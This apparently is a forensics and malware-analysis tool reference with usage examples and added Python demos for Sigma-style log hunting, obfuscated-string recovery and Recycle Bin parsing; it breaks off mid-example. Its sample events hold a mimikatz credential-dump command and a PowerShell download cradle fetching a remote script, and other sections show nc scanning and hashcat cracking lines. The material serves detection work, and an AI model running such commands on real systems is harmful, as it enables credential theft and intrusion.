Binary analysis

capa

capa detects capabilities in executable files. You run it against a PE, ELF, .NET module, shellcode file, or a sandbox report and it tells you what it thinks the program can do. For example, it might suggest that the file is a backdoor, is capable of installing services, or relies on HTTP to communicate.

Examples:

capa.exe suspicious.exe -vv
capa 05be49819139a3fdcdbddbdefd298398779521f3d68daa25275cc77508e42310.json
                    
Detect It Easy
Detect It Easy (DIE) identifies the file type, compiler, linker, packer or protector of an executable from signatures and section entropy. It is a cross-platform application: besides the Windows version there are also Linux and macOS versions.

floss

The FLARE Obfuscated String Solver (FLOSS, formerly FireEye Labs Obfuscated String Solver) uses advanced static analysis techniques to automatically extract and deobfuscate all strings from malware binaries.

Examples:

floss malware.exe
floss --only stack tight -- suspicious.exe
                    
pestudio

The goal of pestudio is to spot artifacts of executable files in order to ease and accelerate Malware Initial Assessment.

PE-bear

PE-bear is a multiplatform reversing tool for PE files. Its objective is to deliver fast and flexible “first view” for malware analysts, stable and capable to handle malformed PE files.

PPEE (puppy)

PPEE (puppy) is a professional PE file explorer for reversers, malware researchers and anyone who wants to statically inspect PE files in more detail.

radare2

radare2 provides a set of libraries, tools and plugins to ease reverse engineering tasks.

Examples:

$ r2 /bin/ls   # open file in read-only
> aaa          # analyse the program (r2 -A)
> afl          # list all functions (try aflt, aflm)
> px 32        # print 32 byte hexdump current block
> s sym.main   # seek to main (using flag name)
> f~foo        # filter flags matching 'foo' (internal |grep)
> iS;is        # list sections and symbols (rabin2 -Ss)
> pdf; agf     # disassembly and ascii-art function graph
> oo+;w hello  # reopen in read-write and write a string
> ?*~...       # interactive filter in all command help
> q            # quit
                    
scdbg

scdbg is a shellcode analysis application built around the libemu emulation library. When run, it emulates the shellcode and displays every Windows API call the shellcode attempts to make.


Chrome utilities

BrowsingHistoryView

BrowsingHistoryView is a utility that reads the history data of different Web browsers (Mozilla Firefox, Google Chrome, Internet Explorer, Microsoft Edge, Opera) and displays the browsing history of all these Web browsers in one table. The browsing history table includes the following information: Visited URL, Title, Visit Time, Visit Count, Web browser and User Profile. BrowsingHistoryView allows you to view the browsing history of all user profiles on a running system, as well as to get the browsing history from an external hard drive.

ChromeCacheView

ChromeCacheView is a small utility that reads the cache folder of Google Chrome Web browser, and displays the list of all files currently stored in the cache. For each cache file, the following information is displayed: URL, Content type, File size, Last accessed time, Expiration time, Server name, Server response, and more.

ChromeCookiesView

ChromeCookiesView is an alternative to the standard internal cookies viewer of the Google Chrome Web browser. It displays the list of all cookies stored by Google Chrome and allows you to easily delete unwanted cookies. It also allows you to export the cookies into a text/csv/html/xml file.


Debugging

x64dbg

x64dbg is an open-source x64/x32 debugger for Windows.


Event log analysis

Hayabusa

Hayabusa is a Windows event log fast forensics timeline generator and threat hunting tool created by the Yamato Security group in Japan.

Examples:

hayabusa.exe search -d ../hayabusa-sample-evtx -k "mimikatz"
hayabusa.exe search -d ../hayabusa-sample-evtx -r "(?:[0-9]{1,3}\.){3}[0-9]{1,3}"
hayabusa.exe search -d ../hayabusa-sample-evtx -r ".*" -F WorkstationName:"kali"
                    
Chainsaw

Chainsaw provides a powerful ‘first-response’ capability to quickly identify threats within Windows forensic artefacts such as Event Logs and the MFT file. Chainsaw offers a generic and fast method of searching through event logs for keywords, and by identifying threats using built-in support for Sigma detection rules, and via custom Chainsaw detection rules.

Examples:

chainsaw hunt EVTX-ATTACK-SAMPLES/ -s sigma/ --mapping mappings/sigma-event-logs-all.yml
chainsaw search mimikatz -i evtx_attack_samples/
chainsaw search -t 'Event.System.EventID: =4104' evtx_attack_samples/
chainsaw search -e "DC[0-9].insecurebank.local" evtx_attack_samples --json
                    
EvtxECmd

EvtxECmd is an event log (evtx) parser with standardized CSV, XML, and json output! Custom maps, locked file support, and more!

Examples:

EvtxECmd.exe -f "C:\Temp\Application.evtx" --csv "c:\temp\out" --csvf MyOutputFile.csv
EvtxECmd.exe -f "C:\Temp\Application.evtx" --csv "c:\temp\out"
EvtxECmd.exe -f "C:\Temp\Application.evtx" --json "c:\temp\jsonout"
                    
APT-Hunter

APT-Hunter is a threat-hunting tool for Windows event logs, built with a purple-team mindset, that detects APT movements hidden in the sea of Windows event logs and shortens the time needed to uncover suspicious activity. APT-Hunter uses pre-defined detection rules and focuses on statistics to uncover anomalies, which is very effective in compromise assessment.

Examples:

APT-Hunter.exe -p /opt/wineventlogs/ -o Project1 -allreport
APT-Hunter.exe -hunt "psexec" -p /opt/wineventlogs/ -o Project2
APT-Hunter.exe -huntfile "(psexec|psexesvc)" -p /opt/wineventlogs/ -o Project2
APT-Hunter.exe -sigma -rules rules.json -p /opt/wineventlogs/ -o Project2
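Hayabusa, Chainsaw and APT-Hunter all reduce to the same two operations: evaluating rules (Sigma or their own format) as field selections joined by a boolean condition, and searching every field of every record by keyword or regex. The following is an added, stand-alone illustration of that core written for this page; it is not code from any of those projects. The events and the rules are constructed for the example, and the Event.System / Event.EventData layout is assumed to mirror the EVTX-as-JSON shape the tools work with.

```python
"""Sigma-style hunting over Windows events exported as JSON.

Added example, not code from Hayabusa, Chainsaw or APT-Hunter: it shows the
core of what those tools do (field selection and a boolean condition per rule,
plus a regex search across every field). The events and rules below are
constructed for this example; the Event.System / Event.EventData layout mirrors
the EVTX-to-JSON shape those tools work with.
"""
import re

# Constructed sample records (not real logs), one dict per event.
EVENTS = [
    {"Event": {"System": {"EventID": 4688, "Computer": "WS01", "EventRecordID": 101},
               "EventData": {"NewProcessName": r"C:\Windows\System32\notepad.exe",
                             "CommandLine": "notepad.exe notes.txt", "SubjectUserName": "alice"}}},
    {"Event": {"System": {"EventID": 4688, "Computer": "WS01", "EventRecordID": 102},
               "EventData": {"NewProcessName": r"C:\Users\alice\Downloads\mimikatz.exe",
                             "CommandLine": 'mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit',
                             "SubjectUserName": "alice"}}},
    {"Event": {"System": {"EventID": 4104, "Computer": "WS01", "EventRecordID": 103},
               "EventData": {"ScriptBlockText": "IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/a.ps1')"}}},
    {"Event": {"System": {"EventID": 7045, "Computer": "DC01", "EventRecordID": 104},
               "EventData": {"ServiceName": "PSEXESVC", "ImagePath": r"%SystemRoot%\PSEXESVC.exe"}}},
    {"Event": {"System": {"EventID": 4624, "Computer": "DC01", "EventRecordID": 105},
               "EventData": {"TargetUserName": "alice", "LogonType": 3, "IpAddress": "10.10.10.10"}}},
]

# Constructed rules in a Sigma-like shape: named selections, Sigma field modifiers
# (contains/startswith/endswith), list values OR'd, fields AND'd, and a condition string.
RULES = [
    {"title": "Mimikatz command line", "detection": {
        "selection": {"Event.System.EventID": 4688,
                      "Event.EventData.CommandLine|contains": ["sekurlsa::", "lsadump::", "privilege::debug"]},
        "condition": "selection"}},
    {"title": "PowerShell download cradle", "detection": {
        "selection": {"Event.System.EventID": 4104,
                      "Event.EventData.ScriptBlockText|contains": ["DownloadString", "DownloadFile", "Invoke-Mimikatz"]},
        "condition": "selection"}},
    {"title": "PsExec service installation", "detection": {
        "selection": {"Event.System.EventID": 7045, "Event.EventData.ImagePath|endswith": r"\PSEXESVC.exe"},
        "filter": {"Event.System.Computer": "BUILD01"},     # hypothetical host where PsExec is expected
        "condition": "selection and not filter"}},
]

def get_field(event, dotted):
    """Resolve 'Event.System.EventID'-style paths; None when any level is missing."""
    cur = event
    for part in dotted.split("."):
        if not isinstance(cur, dict) or part not in cur:
            return None
        cur = cur[part]
    return cur

def value_matches(value, modifier, wanted):
    if value is None:
        return False
    s = str(value).lower()                      # Sigma string matching is case-insensitive
    for w in (wanted if isinstance(wanted, list) else [wanted]):
        w = str(w).lower()
        if (modifier == "" and s == w) or (modifier == "contains" and w in s) \
                or (modifier == "startswith" and s.startswith(w)) or (modifier == "endswith" and s.endswith(w)):
            return True
    return False

def selection_matches(event, selection):
    for key, wanted in selection.items():
        field, _, modifier = key.partition("|")
        if not value_matches(get_field(event, field), modifier, wanted):
            return False
    return True

def evaluate_condition(condition, results):
    """'a and not b or c' with Sigma precedence (not > and > or); no parentheses."""
    def term(t):
        t = t.strip()
        return not results[t[4:].strip()] if t.startswith("not ") else results[t]
    return any(all(term(t) for t in clause.split(" and ")) for clause in condition.split(" or "))

def hunt(events, rules):
    """Return (rule title, EventRecordID) for every rule/event pair that fires."""
    hits = []
    for ev in events:
        for rule in rules:
            det = rule["detection"]
            results = {name: selection_matches(ev, sel) for name, sel in det.items() if name != "condition"}
            if evaluate_condition(det["condition"], results):
                hits.append((rule["title"], get_field(ev, "Event.System.EventRecordID")))
    return hits

def flatten(obj):
    if isinstance(obj, dict):
        for v in obj.values():
            yield from flatten(v)
    else:
        yield obj

def search(events, pattern):
    """Keyword/regex search over every field, like 'hayabusa search -r' or 'chainsaw search -e'."""
    rx = re.compile(pattern, re.IGNORECASE)
    return [get_field(ev, "Event.System.EventRecordID") for ev in events
            if any(rx.search(str(v)) for v in flatten(ev))]

if __name__ == "__main__":
    for title, rec in hunt(EVENTS, RULES):
        print(f"[+] {title}: EventRecordID {rec}")
    print("records with an IPv4 address:", search(EVENTS, r"(?:[0-9]{1,3}\.){3}[0-9]{1,3}"))
```

The third rule shows why a filter clause matters in practice: the same 7045 event that is a finding on a domain controller is noise on a host where PsExec is expected, and the condition "selection and not filter" encodes that without touching the selection. Real rule sets are larger and are applied to every record in every log, so the tools above add field mapping per log source and compiled matchers; the matching semantics are the same.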
                    

Hashing

HashCalc

HashCalc is a free calculator to compute multiple hashes, checksums and HMACs for files, text and hex strings.

Hasher

Hasher is a utility to calculate hashes for files.

GetHashes

Simple batch script for getting MD5, SHA-1, and SHA-256 hashes.

Examples:

GetHashes file.exe
                    

Hex editors

HxD

HxD is a carefully designed and fast hex editor which, additionally to raw disk editing and modifying of main memory (RAM), handles files of any size.


Mail forensics

MailView

MailView is a utility for viewing Outlook Express, Windows Mail/Windows Live Mail and Mozilla Thunderbird message databases as well as single EML files.


Memory forensics

Volatility Workbench

Volatility Workbench is a free, open-source tool that provides a graphical user interface for the Volatility memory forensics framework.

MemProcFS

MemProcFS is an easy and convenient way of viewing physical memory as files in a virtual file system.

Examples:

memprocfs.exe -device c:\temp\win10x64-dump.raw
memprocfs.exe -device c:\temp\win10x64-dump.raw -forensic 1 -forensic-yara-rules c:\yara\rules\windows_malware_index.yar
memprocfs.exe -device unknown-x64-dump.raw -pagefile0 pagefile.sys -pagefile1 swapfile.sys
                    

MFT

MFTECmd

MFTECmd is a $MFT, $Boot, $J, $SDS, $I30, and $LogFile parser. Handles locked files.

Examples:

MFTECmd.exe -f "C:\Temp\SomeMFT" --csv "c:\temp\out" --csvf MyOutputFile.csv
MFTECmd.exe -f "C:\Temp\SomeMFT" --csv "c:\temp\out"
MFTECmd.exe -f "C:\Temp\SomeMFT" --json "c:\temp\jsonout"
MFTECmd.exe -f "C:\Temp\SomeMFT" --body "c:\temp\bout" --bdl c
MFTECmd.exe -f "C:\Temp\SomeMFT" --de 5-5
                    
MFTExplorer

MFTExplorer is a graphical $MFT viewer.


Packing

UPX

UPX is a free, secure, portable, extendable, high-performance executable packer for several executable formats.

Examples:

upx -o packed_file.exe original_file.exe
upx -d packed_file.exe
                    
XVolkolak

XVolkolak is an emulation-based unpacker. Unlike other programs of this type, it does not use the debug API or other features of the operating system, so the packed sample is never actually executed on the host.


Password cracking

Hash Suite Free

Hash Suite is a Windows program to test security of password hashes.

hashcat

hashcat is the world's fastest and most advanced password recovery utility, supporting five unique modes of attack for over 300 highly-optimized hashing algorithms. hashcat currently supports CPUs, GPUs, and other hardware accelerators on Linux, Windows, and macOS, and has facilities to help enable distributed password cracking.

Examples:

hashcat -m 0 -a 0 hash.txt wordlist.txt
hashcat -m 1000 ntlmhash.txt -a 0 rockyou.txt
                    
Ophcrack

Ophcrack is a Windows Password cracker based on Rainbow Tables.


Registry analysis

AmcacheParser

AmcacheParser is an Amcache.hve parser with lots of extra features. Handles locked files.

Examples:

AmcacheParser.exe -f "C:\Temp\amcache\AmcacheWin10.hve" --csv C:\temp
AmcacheParser.exe -f "C:\Temp\amcache\AmcacheWin10.hve" -i on --csv C:\temp --csvf foo.csv
AmcacheParser.exe -f "C:\Temp\amcache\AmcacheWin10.hve" -w "c:\temp\whitelist.txt" --csv C:\temp
                    
AppCompatCacheParser

AppCompatCacheParser is an AppCompatCache aka ShimCache parser.

Examples:

AppCompatCacheParser.exe --csv c:\temp -t -c 2
AppCompatCacheParser.exe --csv c:\temp --csvf results.csv
                    
RECmd

RECmd is a powerful command line Registry tool with searching, multi-hive support, plugins, and more.

Examples:

RECmd.exe --f "C:\Temp\UsrClass 1.dat" --sk URL --recover false --nl
RECmd.exe --f "D:\temp\UsrClass 1.dat" --StartDate "11/13/2014 15:35:01"
RECmd.exe --f "D:\temp\UsrClass 1.dat" --RegEx --sv "(App|Display)Name"
                    
RegistryExplorer

Registry Explorer is a registry viewer with searching, multi-hive support, plugins, and more. Handles locked files.

SBECmd

SBECmd is the command line edition of ShellBags Explorer, for exporting shellbag data.

Examples:

SBECmd.exe -d c:\temp\hives --csv c:\temp\sbeout
SBECmd.exe -d c:\temp\hives --csv c:\temp\sbeout --tz "US Eastern Standard Time"
SBECmd.exe -d c:\temp\hives --csv c:\temp\sbeout --dedupe
                    
ShellBagsExplorer

ShellBagsExplorer is a GUI for browsing shellbags data. Handles locked files.


Disk analysis

bulk_extractor

bulk_extractor is a high-performance digital forensics exploitation tool. It is a "get evidence" button that rapidly scans any kind of input (disk images, files, directories of files, etc) and extracts structured information such as email addresses, credit card numbers, JPEGs and JSON snippets without parsing the file system or file system structures. The results are stored in text files that are easily inspected, searched, or used as inputs for other forensic processing. bulk_extractor also creates histograms of certain kinds of features that it finds, such as Google search terms and email addresses, as previous research has shown that such histograms are especially useful in investigative and law enforcement applications.

Examples:

bulk_extractor -o bulk-out image.img
                    
OSFMount

OSFMount allows you to mount local disk image files (bit-for-bit copies of an entire disk or disk partition) in Windows as a physical disk or a logical drive letter. You can then analyze the disk image file with PassMark OSForensics™ by using the physical disk name (eg. \\.\PhysicalDrive1) or logical drive letter (eg. Z:). By default, the image files are mounted as read only so that the original image files are not altered.

Sleuth Kit tools

The Sleuth Kit® is a collection of command line tools and a C library that allows you to analyze disk images and recover files from them. It is used behind the scenes in Autopsy and many other open source and commercial forensics tools.

Examples:

mmls evidence.dd                      # partition layout; note the start sector of the volume of interest
img_stat evidence.dd                  # image format details
fsstat -i raw evidence.dd             # file system details, image type given explicitly
fsstat evidence.dd                    # same, with the image type auto-detected
fls -i raw evidence.dd                # list files and directories (-r to recurse, -d for deleted entries only)
istat -f ext4 -i raw evidence.dd 2    # metadata of one inode; istat needs the inode number (2 is the ext4 root directory)
                    
PhotoRec

PhotoRec is file data recovery software designed to recover lost files including video, documents and archives from hard disks (Mechanical Hard drives, Solid State Drives...), CD-ROMs, and lost pictures (thus the Photo Recovery name) from digital camera memory. PhotoRec ignores the file system and goes after the underlying data, so it will still work even if your media's file system has been severely damaged or reformatted.

TestDisk

TestDisk is powerful free data recovery software! It was primarily designed to help recover lost partitions and/or make non-booting disks bootable again when these symptoms are caused by faulty software: certain types of viruses or human error (such as accidentally deleting a Partition Table). Partition table recovery using TestDisk is really easy.


Network

nc

nc is a simple utility that reads and writes data across TCP or UDP network connections. It is designed to be a reliable back-end tool to use directly or easily drive by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need, including port binding to accept incoming connections.

Examples:

nc -z -v 10.10.10.10 20-80 # simple port scan
nc -lvp 8080 # listen on port 8080
                    
NetworkMiner

NetworkMiner is an open source network forensics tool that extracts artifacts, such as files, images, emails and passwords, from captured network traffic in PCAP files. NetworkMiner can also be used to capture live network traffic by sniffing a network interface. Detailed information about each IP address in the analyzed network traffic is aggregated into a network host inventory, which can be used for passive asset discovery as well as to get an overview of which devices are communicating.


Utilities

bstrings

bstrings is an advanced strings search program.

Examples:

bstrings.exe -f "C:\Temp\UsrClass 1.dat" --ls URL
bstrings.exe -f "C:\Temp\someFile.txt" --lr guid
bstrings.exe -f "C:\Temp\aBigFile.bin" --fs c:\temp\searchStrings.txt --fr c:\temp\searchRegex.txt -s
bstrings.exe -d "C:\Temp" --mask "*.dll"
bstrings.exe -d "C:\Temp" --ar "[\x20-\x37]"
bstrings.exe -d "C:\Temp" --cp 10007
bstrings.exe -d "C:\Temp" --ls test
bstrings.exe -f "C:\Temp\someOtherFile.txt" --lr cc --sa
bstrings.exe -f "C:\Temp\someOtherFile.txt" --lr cc --sa -m 15 -x 22
bstrings.exe -f "C:\Temp\UsrClass 1.dat" --ls mui --sl
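What bstrings and FLOSS have in common is the starting point: pull every ASCII and UTF-16LE run out of a byte buffer, then go after the strings that plain extraction misses. Here is an added, stand-alone example written for this page that does both for the simplest obfuscation, a one-byte XOR key; it is not code from bstrings or FLOSS. FLOSS recovers strings by emulating the binary's own decoding routines, which this brute force does not attempt. The sample buffer, the XOR key 0x5A and the "interesting string" regex are all assumptions of the example.

```python
"""ASCII / UTF-16LE string extraction plus a single-byte XOR recovery pass.

Added example, not code from bstrings or FLOSS. The buffer below is constructed
here to look like a fragment of a binary: an import name, a UTF-16 API name and
a URL stored XOR-encoded with key 0x5A and a NUL terminator.
"""
import re

def ascii_strings(buf, min_len=4):
    """Printable ASCII runs of at least min_len bytes (what 'strings' prints)."""
    rx = re.compile(rb"[\x20-\x7e]{" + str(min_len).encode() + rb",}")
    return [m.group().decode("ascii") for m in rx.finditer(buf)]

def utf16le_strings(buf, min_len=4):
    """Printable UTF-16LE runs: each character is an ASCII byte followed by 0x00."""
    rx = re.compile(rb"(?:[\x20-\x7e]\x00){" + str(min_len).encode() + rb",}")
    return [m.group().decode("utf-16-le") for m in rx.finditer(buf)]

# Assumed scoring regex: URLs, executable names, drive paths and IPv4 addresses are
# worth reporting; brute-forcing 255 keys otherwise yields a lot of printable junk.
INTERESTING = re.compile(r"https?://|\.(?:exe|dll|ps1|bat)\b|[A-Za-z]:\\|(?:\d{1,3}\.){3}\d{1,3}")

def xor_single_byte(buf, key):
    return bytes(b ^ key for b in buf)

def xor_decoded_strings(buf, min_len=6):
    """Try every one-byte XOR key; keep decoded ASCII runs that look like indicators."""
    hits = []
    for key in range(1, 256):                       # key 0 is the plain buffer
        for s in ascii_strings(xor_single_byte(buf, key), min_len):
            if INTERESTING.search(s):
                hits.append((key, s))
    return hits

def build_sample():
    """Constructed fragment, not a real binary."""
    url = b"http://10.10.10.10/stage2.exe"
    return (b"\x00" * 16
            + b"kernel32.dll\x00\x00"                          # plain ASCII import name
            + "CreateRemoteThread".encode("utf-16-le")         # plain UTF-16LE API name
            + b"\x00" * 8 + b"\x5a\x5a"                        # filler
            + xor_single_byte(url + b"\x00", 0x5A)             # NUL-terminated, XOR-encoded URL
            + b"\x00" * 8)

if __name__ == "__main__":
    data = build_sample()
    print("ascii  :", ascii_strings(data))
    print("utf-16 :", utf16le_strings(data))
    for key, s in xor_decoded_strings(data):
        print(f"xor 0x{key:02x}: {s}")
```

On the sample, the plain pass shows kernel32.dll and CreateRemoteThread but only junk where the URL sits; the XOR pass reports it under key 0x5A. On a real binary expect a handful of false positives from the other 254 keys, which is why the result is scored rather than printed wholesale, and why FLOSS prefers to run the decoding function itself.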
                    
BusyBox

BusyBox is a software suite that provides several Unix utilities in a single executable file.

Examples:

busybox.exe sh
busybox.exe sha1sum file.exe
busybox grep test myfile.txt
                    
CyberChef

CyberChef is a simple, intuitive web app for carrying out all manner of "cyber" operations within a web browser. These operations include simple encoding like XOR and Base64, more complex encryption like AES, DES and Blowfish, creating binary and hexdumps, compression and decompression of data, calculating hashes and checksums, IPv6 and X.509 parsing, changing character encodings, and much more.

DB Browser for SQLite

DB Browser for SQLite is a high quality, visual, open source tool designed for people who want to create, search, and edit SQLite or SQLCipher database files.

dd

dd copies data block by block from an input file or device to an output file; the Windows port used here accepts raw volume and device paths, so it can image a drive or partition.

Examples:

dd if=\\.\Volume{c18588c0-02e9-11d8-853f-00902758442b} of=c:\temp\usb1.img bs=1M
dd if=\\?\Device\Harddisk1\Partition0 of=c:\temp\usb2.img bs=1M --size --progress
                    
exiftool

exiftool is a command-line application and Perl library for reading and writing EXIF, GPS, IPTC, XMP, makernotes and other meta information in image, audio and video files.

Examples:

exiftool image.jpg
                    
Timeline Explorer

Timeline Explorer is a tool for viewing CSV and Excel files, as well as applying filters.

yara

YARA is an open-source tool designed to help malware researchers identify and classify malware samples. It makes it possible to create descriptions (or rules) for malware families based on textual and/or binary patterns. YARA is multi-platform, running on Linux, Windows and Mac OS X. It can be used through its command-line interface or from Python scripts with the YARA-Python extension.

Examples:

yara /foo/bar/rules1 /foo/bar/rules2 .
yara -t Packer -t Compiler /foo/bar/rules bazfile
yara -r /foo
                    
OfficeMalScanner

OfficeMalScanner is an MS Office forensic tool that scans for malicious traces such as shellcode heuristics, PE files or embedded OLE streams. Found files are extracted to disk. It supports disassembly and a hex view as well as an easy brute force mode to detect encrypted files.

Examples:

OfficeMalScanner.exe "C:\File.xls" scan brute debug
OfficeMalScanner.exe "C:\File.xls" info
                    
SQLECmd

SQLECmd is a tool to find and process SQLite files according to your needs with maps.

Examples:

SQLECmd.exe -f "C:\Temp\someFile.db" --csv "c:\temp\out"
SQLECmd.exe -d "C:\Temp\" --csv "c:\temp\out"
SQLECmd.exe -d "C:\Temp\" --hunt --csv "c:\temp\out"
                    
steghide

Steghide is a steganography program that is able to hide data in various kinds of image and audio files.

Examples:

steghide info image.jpg
steghide embed -ef file.txt -cf image.jpg
steghide extract -sf image.jpg
                    
$I Parse

$I Parse is a tool for parsing $I (index) files from the Recycle Bin of Windows Vista and later.

TrID

TrID is a utility designed to identify file types from their binary signatures. While there are similar utilities with hard coded logic, TrID has no fixed rules. Instead, it's extensible and can be trained to recognize new formats in a fast and automatic way.

Examples:

trid c:\test\mydoc.doc
trid c:\temp\* -ae
dir d:\testdrive /s /b | trid -ce -@
                    
WinPython

WinPython is a free open-source portable distribution of the Python programming language for Windows 10/11 and scientific and educational usage.


Windows artifacts

JLECmd

JLECmd is a Jump List parser.

Examples:

JLECmd.exe -f "C:\Temp\f01b4d95cf55d32a.customDestinations-ms" --mp
JLECmd.exe -f "C:\Temp\f01b4d95cf55d32a.automaticDestinations-ms" --json "D:\jsonOutput" --jsonpretty
JLECmd.exe -d "C:\CustomDestinations" --csv "c:\temp" --html "c:\temp" -q
JLECmd.exe -d "C:\Users\e\AppData\Roaming\Microsoft\Windows\Recent" --dt "ddd yyyy MM dd HH:mm:ss.fff"
                    
JumpListExplorer

JumpListExplorer is a GUI based Jump List viewer.

LastActivityView

LastActivityView is a tool for Windows operating system that collects information from various sources on a running system, and displays a log of actions made by the user and events occurred on this computer. The activity displayed by LastActivityView includes: Running .exe file, Opening open/save dialog-box, Opening file/folder from Explorer or other software, software installation, system shutdown/start, application or system crash, network connection/disconnection and more.

LECmd

LECmd is a tool for parsing Windows shortcut (.lnk) files.

Examples:

LECmd.exe -f "C:\Temp\foobar.lnk"
LECmd.exe -f "C:\Temp\somelink.lnk" --json "D:\jsonOutput" --pretty
LECmd.exe -d "C:\Temp" --csv "c:\temp" --html c:\temp --xml c:\temp\xml -q
LECmd.exe -f "C:\Temp\some other link.lnk" --nid --neb
LECmd.exe -d "C:\Temp" --all
                    
PECmd

PECmd is a Prefetch parser.

Examples:

PECmd.exe -f "C:\Temp\CALC.EXE-3FBEF7FD.pf"
PECmd.exe -f "C:\Temp\CALC.EXE-3FBEF7FD.pf" --json "D:\jsonOutput" --jsonpretty
PECmd.exe -d "C:\Temp" -k "system32, fonts"
PECmd.exe -d "C:\Temp" --csv "c:\temp" --csvf foo.csv --json c:\temp\json
PECmd.exe -d "C:\Windows\Prefetch"
                    
RBCmd

RBCmd is a Recycle Bin artifact (INFO2/$I) parser.

Examples:

RBCmd.exe -f "C:\Temp\INFO2"
RBCmd.exe -f "C:\Temp\$I3VPA17" --csv "D:\csvOutput"
RBCmd.exe -d "C:\Temp" --csv "c:\temp"
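The $I records that $I Parse (listed under Utilities) and RBCmd read are small and fixed in layout: version, original size, deletion time as a FILETIME, then the original path, stored as a fixed 520-byte UTF-16LE field in version 1 (Vista to 8.1) or as a character count followed by the path in version 2 (Windows 10 and later). The following is an added example written for this page that parses both versions and maps a $I name to its $R companion; it is not code from $I Parse or RBCmd. The two records, their paths, sizes and deletion times are constructed in-line.

```python
"""Parser for Windows Recycle Bin $I metadata records (Vista and later).

Added example, not code from $I Parse or RBCmd. It follows the documented $I
layout: version (u64), original size (u64), deletion time as a FILETIME (u64),
then either a fixed 520-byte UTF-16LE path (version 1, Vista to 8.1) or a u32
character count followed by the UTF-16LE path (version 2, Windows 10 and later).
The two records below are constructed in-line, not taken from a real system.
"""
import struct
from datetime import datetime, timedelta, timezone

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
UNIX_EPOCH_AS_FILETIME = 116_444_736_000_000_000   # 1970-01-01 in 100-ns ticks since 1601

def filetime_to_datetime(ft):
    """Convert 100-ns ticks since 1601-01-01 UTC to an aware datetime."""
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)

def parse_dollar_i(data):
    """Return version, original size, deletion time and original path of one $I record."""
    if len(data) < 24:
        raise ValueError("record too short for the $I header")
    version, size, ft = struct.unpack_from("<QQQ", data, 0)
    if version == 1:
        raw = data[24:24 + 520]
        if len(raw) < 520:
            raise ValueError("truncated version-1 path field")
        path = raw.decode("utf-16-le").split("\x00", 1)[0]
    elif version == 2:
        (nchars,) = struct.unpack_from("<I", data, 24)      # count includes the NUL terminator
        raw = data[28:28 + nchars * 2]
        if len(raw) < nchars * 2:
            raise ValueError("truncated version-2 path field")
        path = raw.decode("utf-16-le").rstrip("\x00")
    else:
        raise ValueError(f"unknown $I version {version}")
    return {"version": version, "size": size, "deleted": filetime_to_datetime(ft), "path": path}

def is_valid_record(data):
    try:
        parse_dollar_i(data)
        return True
    except (ValueError, struct.error, UnicodeDecodeError):
        return False

def recycled_name(i_name):
    """$I<id> carries the metadata; the matching $R<id> holds the file content."""
    if not i_name.startswith("$I"):
        raise ValueError("not a $I file name")
    return "$R" + i_name[2:]

# Deletion time used by both samples: Unix time 1600000000 = 2020-09-13 12:26:40 UTC.
SAMPLE_FILETIME = UNIX_EPOCH_AS_FILETIME + 1_600_000_000 * 10_000_000

def build_sample_v1():
    path = r"C:\Users\alice\Desktop\budget.xlsx"
    return struct.pack("<QQQ", 1, 48_123, SAMPLE_FILETIME) + path.encode("utf-16-le").ljust(520, b"\x00")

def build_sample_v2():
    path = r"C:\Users\alice\Documents\secret.docx"
    one_hour = 3600 * 10_000_000
    return (struct.pack("<QQQI", 2, 123_456, SAMPLE_FILETIME + one_hour, len(path) + 1)
            + (path + "\x00").encode("utf-16-le"))

if __name__ == "__main__":
    for name, blob in (("$I3VPA17", build_sample_v1()), ("$IQ7K2ZX", build_sample_v2())):
        rec = parse_dollar_i(blob)
        print(f"{name} -> {recycled_name(name)}: v{rec['version']} {rec['size']} bytes "
              f"deleted {rec['deleted'].isoformat()} path {rec['path']}")
```

Two caveats a practitioner will want: the deletion timestamp is UTC and should be reported as such (RBCmd and the other Zimmerman tools do the same unless a time zone is requested), and a $I without its $R means the content was already purged, while a $R without a $I means the metadata is gone and the original path has to be inferred elsewhere.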
                    
RecentFileCacheParser

RecentFileCacheParser is a RecentFileCache.bcf parser.

Examples:

RecentFileCacheParser.exe -f "C:\Temp\RecentFileCache.bcf" --csv "c:\temp"
RecentFileCacheParser.exe -f "C:\Temp\RecentFileCache.bcf" --json "D:\jsonOutput" --jsonpretty
                    
SDBExplorer

SDBExplorer is a Shim database GUI tool.

Thumbcache viewer

Thumbcache Viewer allows you to extract thumbnail images from the thumbcache_*.db and iconcache_*.db database files found on Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, and Windows 11.

WFA

WFA (Windows File Analyzer) decodes and analyzes several special files used by the Windows OS.

WinPrefetchView

WinPrefetchView is a small utility that reads the Prefetch files stored in your system and displays the information stored in them. By looking in these files, you can learn which files every application is using, and which files are loaded on Windows boot.

SrumECmd

SrumECmd is a SRUM parser.

Examples:

SrumECmd.exe -f "C:\Temp\SRUDB.dat" -r "C:\Temp\SOFTWARE" --csv "C:\Temp\"
SrumECmd.exe -f "C:\Temp\SRUDB.dat" --csv "c:\temp"
SrumECmd.exe -d "C:\Temp" --csv "c:\temp"
                    
SumECmd

SumECmd processes Microsoft User Access Logging (UAL) databases.

Examples:

SumECmd.exe -d "C:\Temp\sum" --csv "C:\Temp\"
                    
WxTCmd

WxTCmd is a parser for the Windows 10 Timeline feature database.

Examples:

WxTCmd.exe -f "C:\Users\eric\AppData\Local\ConnectedDevicesPlatform\L.eric\ActivitiesCache.db" --csv c:\temp
                    

Python 3 utilities

bmc-tools

BMC-Tools is an RDP bitmap cache parser.

pyinstxtractor

PyInstaller Extractor is a script to extract the contents of a PyInstaller generated executable file.

Examples:

python pyinstxtractor.py test.exe
                    
pefile

pefile is a multi-platform Python module to parse and work with Portable Executable (PE) files. Most of the information contained in the PE file headers is accessible, as well as all the sections' details and data.
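The header walk that pefile performs, and that pestudio, PE-bear, PPEE and Detect It Easy build their views on, is short enough to show end to end: DOS header to e_lfanew, PE signature, COFF file header, optional header (PE32 or PE32+), then the section table, after which per-section entropy and characteristics give the usual packing hints. The following is an added example written for this page, not code from pefile or any of those tools. The sample is a minimal constructed PE32+ image with a clean .text section and a UPX1-style writable and executable section; the packer section-name list and the 7.0 entropy threshold are assumptions of the example.

```python
"""Hand-rolled reader for the PE headers that pefile, pestudio, PE-bear and
PPEE expose, plus the packing heuristics DIE-style tools use.

Added example, not code from pefile or any of the tools above. The PE layout
parsed here is the documented one (DOS header, PE signature, COFF file header,
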